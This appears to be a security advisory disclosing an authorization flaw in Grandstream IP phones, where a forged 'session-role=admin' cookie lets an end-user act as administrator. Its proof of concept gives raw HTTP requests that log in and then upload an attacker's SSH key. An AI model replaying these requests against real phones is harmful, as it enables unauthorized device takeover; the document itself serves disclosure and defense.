Improper authorization leads to privilege escalation on Grandstream IP Phone GXP16XX/14XX

Summary

An improper authorization vulnerability was discovered in Grandstream IP Phones, which can be abused to access to privileged functionality using an end-user session-identity token.

Note: Which are the capabilities of the end-user account?

When you log in as an end-user, you are only able to view the Status, Advanced and Maintenance page. The end-user will not be able to modify the Account page.
https://blog.grandstream.com/faq/product-related-questions/gxv3140-ip-multimedia-phone/basic-installation-and-settings

CVSS

8.0 (High) - CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Details:

On successful administrator or end-user account type login, the web application returns a json and cookies fields that contain the session material:

• session-identity: Session token.
• session-role: The role of the logged-in account (user for end-user or admin for administrator).

The IP phone does not validate the privilege of the session token and assumes the role specified in the session-role attribute. An adversary with end-user account credentials can change this attribute to admin to gain full control over the device and perform privileged actions.

POC

In the following proof of concept will be add a ssh-key using end-user credentials.

Request:

Login process

POST http://192.168.1.168/cgi-bin/dologin HTTP/1.1
Host: 192.168.1.168
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Content-Length: 26
Origin: http://192.168.1.168
Connection: keep-alive
Referer: http://192.168.1.168/

username=user&password=123

Response

HTTP/1.0 200 OK
Content-Type: application/json;charset=UTF-8
Cache-Control: no-cache, must-revalidate
Status: 200 OK
Set-Cookie: session-role=user
Set-Cookie: session-identity=1065420273e1688942574
Content-Length: 108

{ "response": "success", "body": { "sid": "1065420273e1688942574", "role": "user", "defaultAuth": true } }

Add SSH key using end-user session token

Request

The session-role need to be changed from user to admin

POST http://192.168.1.168/cgi-bin/upload_sshkey HTTP/1.1
Host: 192.168.1.168
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------145907516630748272162929562839
Content-Length: 1063
Origin: http://192.168.1.168
Connection: keep-alive
Referer: http://192.168.1.168/
Cookie: session-role=admin; session-identity=1065420273e1688942574; session-identity=1065420273e1688942574
Upgrade-Insecure-Requests: 1

-----------------------------145907516630748272162929562839
Content-Disposition: form-data; name="file"; filename="id_rsa.pub"
Content-Type: application/octet-stream

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDGU86H6H/IZbtVH4ENqM5ypW1rPkuxUlNec0iv+mIibe8z9KCa++HC3rKr3mpWhVRMGYdfoCDJsgVFBti2njpRfTh52Jy5WW9IK90v9GCWQg
[snip...]
-----------------------------145907516630748272162929562839
Content-Disposition: form-data; name="fname"

C:\fakepath\id_rsa.pub
-----------------------------145907516630748272162929562839
Content-Disposition: form-data; name="sid"

1065420273e1688942574
-----------------------------145907516630748272162929562839--